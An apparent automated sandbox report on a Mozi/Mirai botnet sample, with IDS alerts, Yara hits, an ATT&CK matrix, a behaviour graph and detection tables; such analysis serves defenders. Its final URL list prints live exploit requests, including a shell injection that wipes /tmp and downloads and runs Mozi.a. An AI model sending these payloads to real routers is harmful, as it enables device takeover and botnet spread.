                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: Yara matchFile source: 6226.1.00007fd22c017000.00007fd22c058000.r-x.sdmp, type: MEMORY
                            Source: Yara matchFile source: 6228.1.00007fd22c017000.00007fd22c058000.r-x.sdmp, type: MEMORY
                            Source: Yara matchFile source: Mozi.m.elf, type: SAMPLE
                            Source: Yara matchFile source: /usr/networks, type: DROPPED
                            Source: Yara matchFile source: 6226.1.00007fd22c060000.00007fd22c06a000.rw-.sdmp, type: MEMORY
                            Source: Yara matchFile source: 6228.1.00007fd22c060000.00007fd22c06a000.rw-.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: Mozi.m.elf PID: 6226, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Mozi.m.elf PID: 6228, type: MEMORYSTR
                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information3
                            Scripting
                            Valid Accounts1
                            Command and Scripting Interpreter
                            1
                            Unix Shell Configuration Modification
                            1
                            Unix Shell Configuration Modification
                            1
                            Masquerading
                            1
                            OS Credential Dumping
                            11
                            Security Software Discovery
                            Remote ServicesData from Local System1
                            Encrypted Channel
                            Exfiltration Over Other Network Medium1
                            Data Manipulation
                            CredentialsDomainsDefault AccountsScheduled Task/Job3
                            Scripting
                            Boot or Logon Initialization Scripts1
                            Hide Artifacts
                            1
                            Brute Force
                            1
                            Virtualization/Sandbox Evasion
                            Remote Desktop ProtocolData from Removable Media11
                            Non-Standard Port
                            Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                            Virtualization/Sandbox Evasion
                            Security Account Manager1
                            Remote System Discovery
                            SMB/Windows Admin SharesData from Network Shared Drive3
                            Ingress Tool Transfer
                            Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                            File and Directory Permissions Modification
                            NTDS1
                            System Network Configuration Discovery
                            Distributed Component Object ModelInput Capture4
                            Non-Application Layer Protocol
                            Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            Hidden Files and Directories
                            LSA Secrets11
                            File and Directory Discovery
                            SSHKeylogging5
                            Application Layer Protocol
                            Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            File Deletion
                            Cached Domain Credentials1
                            System Information Discovery
                            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            No configs have been found
                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Number of created Files
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572834 Sample: Mozi.m.elf Startdate: 11/12/2024 Architecture: LINUX Score: 100 74 110.93.67.47, 58272, 80 CLEARPATH-AS-APClearPathNetworksIncPH Philippines 2->74 76 203.88.139.172 YOU-INDIA-APYOUBroadbandCableIndiaLtdIN India 2->76 78 102 other IPs or domains 2->78 80 Suricata IDS alerts for network traffic 2->80 82 Malicious sample detected (through community Yara rule) 2->82 84 Antivirus detection for dropped file 2->84 86 6 other signatures 2->86 11 Mozi.m.elf 2->11         started        13 dash rm 2->13         started        15 dash rm 2->15         started        signatures3 process4 process5 17 Mozi.m.elf 11->17         started        process6 19 Mozi.m.elf 17->19         started        file7 66 /usr/networks, ELF 19->66 dropped 68 /usr/bin/rescan-scsi-bus.sh, ASCII 19->68 dropped 70 /usr/bin/gettext.sh, ASCII 19->70 dropped 72 16 other malicious files 19->72 dropped 90 Sample tries to set files in /etc globally writable 19->90 92 Sample tries to persist itself using /etc/profile 19->92 94 Drops files in suspicious directories 19->94 96 2 other signatures 19->96 23 Mozi.m.elf 19->23         started        26 Mozi.m.elf sh 19->26         started        28 Mozi.m.elf sh 19->28         started        30 30 other processes 19->30 signatures8 process9 signatures10 102 Opens /proc/net/* files useful for finding connected devices and routers 23->102 32 Mozi.m.elf sh 23->32         started        34 Mozi.m.elf sh 23->34         started        36 Mozi.m.elf sh 23->36         started        47 5 other processes 23->47 38 sh killall 26->38         started        41 sh iptables 28->41         started        43 sh iptables 30->43         started        45 sh iptables 30->45         started        49 21 other processes 30->49 process11 signatures12 51 sh iptables 32->51         started        54 sh iptables 34->54         started        56 sh iptables 36->56         started        98 Terminates several processes with shell command 'killall' 38->98 100 Executes the "iptables" command to insert, remove and/or manipulate rules 41->100 58 sh iptables 47->58         started        60 sh iptables 47->60         started        62 sh iptables 47->62         started        64 2 other processes 47->64 process13 signatures14 88 Executes the "iptables" command to insert, remove and/or manipulate rules 51->88
                            SourceDetectionScannerLabelLink
                            Mozi.m.elf63%ReversingLabsLinux.Trojan.Mirai
                            Mozi.m.elf100%AviraEXP/ELF.Mirai.O
                            SourceDetectionScannerLabelLink
                            /usr/networks100%AviraEXP/ELF.Mirai.O
                            /etc/init.d/S95baby.sh0%ReversingLabs
                            /etc/rcS.d/S95baby.sh0%ReversingLabs
                            /usr/networks63%ReversingLabsLinux.Trojan.Mirai
                            No Antivirus matches
                            SourceDetectionScannerLabelLink
                            http://12.57.50.133:80/HNAP1/0%Avira URL Cloudsafe
                            http://212.59.33.56:80/HNAP1/0%Avira URL Cloudsafe
                            http://68.146.175.8:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://159.187.57.28:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://182.253.181.162:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://196.117.13.231:80/HNAP1/0%Avira URL Cloudsafe
                            http://81.15.115.147:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://204.118.69.75:80/HNAP1/0%Avira URL Cloudsafe
                            http://212.251.149.126:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://173.143.115.27:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://49.33.247.182:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://171.135.110.34:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://202.218.205.135:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://79.183.65.108:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://147.43.49.146:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://89.176.240.190:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://93.31.4.225:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://149.247.149.135:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://71.123.229.71:80/HNAP1/0%Avira URL Cloudsafe
                            http://95.251.127.79:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://141.97.115.0:80/HNAP1/0%Avira URL Cloudsafe
                            http://177.171.143.161:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://46.111.113.5:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://47.35.112.78:80/HNAP1/0%Avira URL Cloudsafe
                            http://132.222.51.120:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://117.127.243.172:80/HNAP1/0%Avira URL Cloudsafe
                            http://56.19.188.37:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://51.94.121.88:80/HNAP1/0%Avira URL Cloudsafe
                            http://150.55.156.79:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://29.139.34.171:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://76.227.143.215:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://90.117.21.100:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://140.219.139.217:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://175.33.232.251:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://171.205.214.110:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://12.160.75.231:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://9.80.6.139:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://172.27.14.53:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://5.198.114.62:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://174.134.196.29:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://98.47.138.236:80/HNAP1/0%Avira URL Cloudsafe
                            http://44.53.44.137:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://188.113.108.36:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://42.242.241.33:80/HNAP1/0%Avira URL Cloudsafe
                            http://37.215.196.232:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://26.69.186.179:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://183.20.224.51:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://193.90.130.102:80/HNAP1/0%Avira URL Cloudsafe
                            http://173.47.65.7:80/HNAP1/0%Avira URL Cloudsafe
                            http://161.116.19.154:80/HNAP1/0%Avira URL Cloudsafe
                            http://75.151.1.33:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://117.197.168.185:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://131.224.165.201:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://168.58.175.249:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://114.187.116.66:80/HNAP1/0%Avira URL Cloudsafe
